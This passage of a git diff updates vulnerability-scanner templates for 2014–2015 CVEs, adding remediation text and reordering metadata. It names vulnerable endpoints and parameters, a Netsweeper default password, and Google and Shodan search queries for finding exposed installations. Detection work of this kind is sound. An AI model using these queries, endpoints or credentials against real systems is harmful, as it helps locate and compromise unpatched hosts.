CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.83554 - cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* epss-percentile: 0.98005 + cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/dzs-videogallery" - framework: wordpress vendor: digitalzoomstudio product: video_gallery + framework: wordpress + google-query: inurl:"/wp-content/plugins/dzs-videogallery" tags: cve2014,wordpress,xss,wp-plugin,seclists,cve http: diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index e5508e72fe..961d60cf26 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + remediation: | + Update WordPress DB Backup plugin to version 4.6 or higher. reference: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 @@ -18,13 +20,13 @@ info: cve-id: CVE-2014-9119 cwe-id: CWE-22 epss-score: 0.30825 - cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96385 + cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: db_backup_project product: db_backup + framework: wordpress tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb http: diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 23d3589182..9dc8fc2c8f 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. + remediation: | + Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 @@ -15,13 +17,13 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.00287 - cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* epss-percentile: 0.64821 + cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: frontend_uploader_project product: frontend_uploader + framework: wordpress tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth http: diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 101755d6d4..d160d3aa60 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.40937 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 59db856637..dd8558cb5d 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9607 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* epss-percentile: 0.40937 + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index b2da0ce5fd..8c996fff52 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 @@ -16,8 +18,8 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.40937 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index f13c56b0c8..fd452bcc1c 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + remediation: | + Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00212 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.5835 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index f531e1854a..0d67065af3 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + remediation: | + Change the default credentials to strong and unique ones. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.84911 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 66c682b9b6..642c6bb209 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9615 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* epss-percentile: 0.40937 + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index ec6b679ec6..b55457effa 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9617 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.43264 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 995e5dd042..5e985faeaa 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-percentile: 0.90239 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 7dad531c2f..7cffd109d6 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/35721 - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-0554 cwe-id: CWE-264 epss-score: 0.0196 - cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* epss-percentile: 0.87242 + cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adb diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 5c15e3f477..d4c3cf6cf2 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + remediation: | + Update to the latest version of the plugin. reference: - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005 @@ -16,13 +18,13 @@ info: cve-id: CVE-2015-1000005 cwe-id: CWE-22 epss-score: 0.04406 - cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.91313 + cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: candidate-application-form_project product: candidate-application-form + framework: wordpress tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 72450b6d93..61b0e64116 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + remediation: | + Update to the latest version of the WordPress Simple Image Manipulator plugin. reference: - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543 @@ -17,13 +19,13 @@ info: cve-id: CVE-2015-1000010 cwe-id: CWE-284 epss-score: 0.02653 - cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.8903 + cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: simple-image-manipulator_project product: simple-image-manipulator + framework: wordpress tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 7ad12951f0..efe1e33d5d 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. + remediation: | + Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 @@ -16,14 +18,14 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00773 - cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* epss-percentile: 0.79053 + cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/mypixs" - framework: wordpress vendor: mypixs_project product: mypixs + framework: wordpress + google-query: inurl:"/wp-content/plugins/mypixs" tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve http: diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index ef4c816d77..d399110245 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. + remediation: | + Apply the latest security patches and updates provided by ElasticSearch to fix the deserialization vulnerability. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-1427 cwe-id: CWE-284 epss-score: 0.88469 - cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* epss-percentile: 0.98266 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: elasticsearch diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index d0a76c58a3..b380e3ac89 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. + remediation: | + Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - http://www.icewarp.com @@ -16,13 +18,13 @@ info: cve-id: CVE-2015-1503 cwe-id: CWE-22 epss-score: 0.94041 - cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* epss-percentile: 0.98821 + cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"icewarp" vendor: icewarp product: mail_server + shodan-query: title:"icewarp" tags: lfi,mail,packetstorm,cve,cve2015,icewarp http: diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 9ef0fe02c1..7ff4adfddd 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. + remediation: | + Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 @@ -18,14 +20,14 @@ info: cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.92959 - cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* epss-percentile: 0.98662 + cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 - google-query: inurl:/wp-content/plugins/revslider - framework: wordpress vendor: elegant_themes product: divi + framework: wordpress + google-query: inurl:/wp-content/plugins/revslider tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 http: diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index c243cc6aa6..7f01c95b62 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + remediation: | + Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability. reference: - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - http://www.fortiguard.com/advisory/FG-IR-15-005/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* epss-percentile: 0.57316 + cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index c2df2187cb..2af232eb45 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Apply the latest security patches and updates provided by Magento. reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 @@ -15,14 +17,14 @@ info: cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.01338 - cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* epss-percentile: 0.84395 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 - shodan-query: http.component:"Magento" - framework: magento_server vendor: magmi_project product: magmi + framework: magento_server + shodan-query: http.component:"Magento" tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi http: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 2052e941f6..706a718ccd 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. + remediation: | + Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module. reference: - https://www.exploit-db.com/exploits/35996 - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html @@ -15,15 +17,15 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* epss-percentile: 0.49807 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: - max-request: 1 - shodan-query: http.component:"Magento" verified: true - framework: magento_server + max-request: 1 vendor: magmi_project product: magmi + framework: magento_server + shodan-query: http.component:"Magento" tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss http: diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 725bfd9396..37d4313125 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header. + remediation: | + Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability. reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-2080 cwe-id: CWE-200 epss-score: 0.95465 - cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* epss-percentile: 0.99111 + cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fedoraproject diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 14ee966d91..eadcb4dc26 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application. reference: - https://www.exploit-db.com/exploits/36619 - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-2166 cwe-id: CWE-22 epss-score: 0.27262 - cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* epss-percentile: 0.96165 + cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ericsson diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 2df735a008..19ac1c3385 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad - https://wordpress.org/plugins/spider-event-calendar/ - http://www.exploit-db.com/exploits/36061 - https://nvd.nist.gov/vuln/detail/CVE-2015-2196 - remediation: Fixed in version 1.4.14. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 - cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* epss-percentile: 0.81015 + cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: web-dorado product: spider_calendar + framework: wordpress tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve http: diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index bbdd2a9f0d..d95d57a549 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php. + remediation: | + Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/131155/ - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.02569 - cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88871 + cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: ab_google_map_travel_project product: ab_google_map_travel + framework: wordpress tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve http: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index ab862a96ad..86268aad8b 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. + remediation: | + Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00665 - cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* epss-percentile: 0.77092 + cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/navis-documentcloud" - framework: wordpress vendor: documentcloud product: navis_documentcloud + framework: wordpress + google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve,cve2015,wordpress,wp-plugin,xss http: diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index e0f21c4d59..124d095290 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ 